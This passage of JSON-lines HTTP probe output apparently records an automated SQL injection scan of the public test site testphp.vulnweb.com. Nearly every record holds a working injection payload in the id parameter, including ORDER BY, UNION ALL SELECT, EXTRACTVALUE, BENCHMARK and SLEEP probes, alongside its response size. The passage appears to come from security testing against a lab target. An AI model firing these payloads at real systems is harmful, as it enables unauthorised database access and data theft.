inx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.683195208Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%201--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%201--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20ORDER%20BY%201--%20-\",\"time\":\"344.267738ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:16.852426983Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%202--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%202--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20ORDER%20BY%202--%20-\",\"time\":\"341.229549ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:20.26030653Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%203--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%203--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20ORDER%20BY%203--%20-\",\"time\":\"350.973537ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:20.351801366Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%204--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%204--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20ORDER%20BY%204--%20-\",\"time\":\"356.894914ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:21.08921127Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%206--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20ORDER%20BY%206--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20ORDER%20BY%206--%20-\",\"time\":\"359.888866ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:21.092395688Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%283182%2CCONCAT%280x5c%2C0x7176716271%2C%28SELECT%20%28CASE%20WHEN%20%283182%3D3182%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b786b71%29%29%2C1%29\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%283182%2CCONCAT%280x5c%2C0x7176716271%2C%28SELECT%20%28CASE%20WHEN%20%283182%3D3182%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b786b71%29%29%2C1%29\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%283182%2CCONCAT%280x5c%2C0x7176716271%2C%28SELECT%20%28CASE%20WHEN%20%283182%3D3182%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b786b71%29%29%2C1%29\",\"time\":\"355.581948ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:21.099216782Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%283305%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x46684b41%29%29%29%29%29%2C1%29--%20HtzW\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%283305%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x46684b41%29%29%29%29%29%2C1%29--%20HtzW\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%283305%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x46684b41%29%29%29%29%29%2C1%29--%20HtzW\",\"time\":\"342.960003ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:21.12369254Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%286520%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x75556a6d%29%29%29%29%29%2C1%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%286520%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x75556a6d%29%29%29%29%29%2C1%29%23\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%286520%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x75556a6d%29%29%29%29%29%2C1%29%23\",\"time\":\"348.770213ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:21.848185556Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%287428%2CCONCAT%280x5c%2C0x7162787a71%2C%28SELECT%20%28CASE%20WHEN%20%287428%3D7428%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b7a6271%29%29%2C1%29--%20Offy\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%287428%2CCONCAT%280x5c%2C0x7162787a71%2C%28SELECT%20%28CASE%20WHEN%20%287428%3D7428%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b7a6271%29%29%2C1%29--%20Offy\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%287428%2CCONCAT%280x5c%2C0x7162787a71%2C%28SELECT%20%28CASE%20WHEN%20%287428%3D7428%29%20THEN%201%20ELSE%200%20END%29%29%2C0x716b7a6271%29%29%2C1%29--%20Offy\",\"time\":\"348.253676ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:25.044414097Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%288201%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28CASE%20WHEN%20%288201%3D8201%29%20THEN%201%20ELSE%200%20END%29%29%2C0x71706b6a71%29%29%2C1%29--%20Ofsd\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%288201%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28CASE%20WHEN%20%288201%3D8201%29%20THEN%201%20ELSE%200%20END%29%29%2C0x71706b6a71%29%29%2C1%29--%20Ofsd\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%288201%2CCONCAT%280x5c%2C0x7178706a71%2C%28SELECT%20%28CASE%20WHEN%20%288201%3D8201%29%20THEN%201%20ELSE%200%20END%29%29%2C0x71706b6a71%29%29%2C1%29--%20Ofsd\",\"time\":\"339.229443ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:25.050724279Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%289432%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x494b4a4f%29%29%29%29%29%2C1%29--%20ySPZ\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%289432%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x494b4a4f%29%29%29%29%29%2C1%29--%20ySPZ\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20PROCEDURE%20ANALYSE%28EXTRACTVALUE%289432%2CCONCAT%280x5c%2C%28BENCHMARK%285000000%2CMD5%280x494b4a4f%29%29%29%29%29%2C1%29--%20ySPZ\",\"time\":\"340.425675ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:25.327207699Z\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20ELT%288485%3D8485%2CSLEEP%285%29%29%23\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20OR%20ELT%288485%3D8485%2CSLEEP%285%29%29%23\",\"error\":\"context deadline exceeded (Client.Timeout exceeded while awaiting headers)\",\"words\":0,\"lines\":0,\"failed\":true}\n{\"timestamp\":\"2024-11-13T02:21:26.046528118Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x674967464f526f497a65%2C0x71706b6a71%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x674967464f526f497a65%2C0x71706b6a71%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x674967464f526f497a65%2C0x71706b6a71%29--%20-\",\"time\":\"352.475665ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.077611442Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x6b49584458565a64467463566d724642596b48724169737347755a626e6361487447716655596246%2C0x71706b6a71%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x6b49584458565a64467463566d724642596b48724169737347755a626e6361487447716655596246%2C0x71706b6a71%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%2057%2CCONCAT%280x7178706a71%2C0x6b49584458565a64467463566d724642596b48724169737347755a626e6361487447716655596246%2C0x71706b6a71%29--%20-\",\"time\":\"347.933317ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.080287516Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x45477071434e57777072%2C0x71706b6a71%29%2C57--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x45477071434e57777072%2C0x71706b6a71%29%2C57--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x45477071434e57777072%2C0x71706b6a71%29%2C57--%20-\",\"time\":\"346.459981ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.153091224Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x50776454564d694951416d4b6d7075657a70507451485048487867707574556150454c776b764c6b%2C0x71706b6a71%29%2C57--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x50776454564d694951416d4b6d7075657a70507451485048487867707574556150454c776b764c6b%2C0x71706b6a71%29%2C57--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x50776454564d694951416d4b6d7075657a70507451485048487867707574556150454c776b764c6b%2C0x71706b6a71%29%2C57--%20-\",\"time\":\"353.492056ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.155408441Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x6b4e4a454c7652494765%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x6b4e4a454c7652494765%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x6b4e4a454c7652494765%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"time\":\"340.302456ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.196206803Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x704f697453666e784964687876764a6c6c457150444f58456b63677949636a6147504e6964654154%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x704f697453666e784964687876764a6c6c457150444f58456b63677949636a6147504e6964654154%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x704f697453666e784964687876764a6c6c457150444f58456b63677949636a6147504e6964654154%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"343.098752ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.276106683Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7a6c5754656d755a4672434b75615468454c6c734a796b554e42444178504a4845674d4f6e426352%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7a6c5754656d755a4672434b75615468454c6c734a796b554e42444178504a4845674d4f6e426352%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20CONCAT%280x7178706a71%2C0x7a6c5754656d755a4672434b75615468454c6c734a796b554e42444178504a4845674d4f6e426352%2C0x71706b6a71%29%2CNULL%2CNULL--%20-\",\"time\":\"349.408144ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.446742396Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x4541575476586d6e6e58416c786d7578657841536a7844766e696943754c614d73744c535a666271%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x4541575476586d6e6e58416c786d7578657841536a7844766e696943754c614d73744c535a666271%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x4541575476586d6e6e58416c786d7578657841536a7844766e696943754c614d73744c535a666271%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"346.687363ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.496203118Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x615258465768637a5769%2C0x71706b6a71%29%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x615258465768637a5769%2C0x71706b6a71%29%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x615258465768637a5769%2C0x71706b6a71%29%2CNULL--%20-\",\"time\":\"343.535425ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.605279772Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x6d4d6155774e4d625161537278706a71666154425968797847585a5a6273574c78515a696f6f7973%2C0x71706b6a71%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x6d4d6155774e4d625161537278706a71666154425968797847585a5a6273574c78515a696f6f7973%2C0x71706b6a71%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7178706a71%2C0x6d4d6155774e4d625161537278706a71666154425968797847585a5a6273574c78515a696f6f7973%2C0x71706b6a71%29--%20-\",\"time\":\"353.229402ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":15,\"lines\":4,\"status_code\":200,\"content_length\":148,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.634591577Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7178706a71%2C0x6662707068565650784c794c6a6e435050774c656b6d584e5677696e6b47656e705a796851697a56%2C0x71706b6a71%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7178706a71%2C0x6662707068565650784c794c6a6e435050774c656b6d584e5677696e6b47656e705a796851697a56%2C0x71706b6a71%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7178706a71%2C0x6662707068565650784c794c6a6e435050774c656b6d584e5677696e6b47656e705a796851697a56%2C0x71706b6a71%29--%20-\",\"time\":\"347.919972ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.661563976Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7178706a71%2C0x73594c4f44576f4e4675%2C0x71706b6a71%29--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7178706a71%2C0x73594c4f44576f4e4675%2C0x71706b6a71%29--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7178706a71%2C0x73594c4f44576f4e4675%2C0x71706b6a71%29--%20-\",\"time\":\"344.185932ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":207,\"lines\":21,\"status_code\":200,\"content_length\":1343,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:26.704108063Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"input\":\"http://testphp.vulnweb.com/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20-\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/xml\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infoartist.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%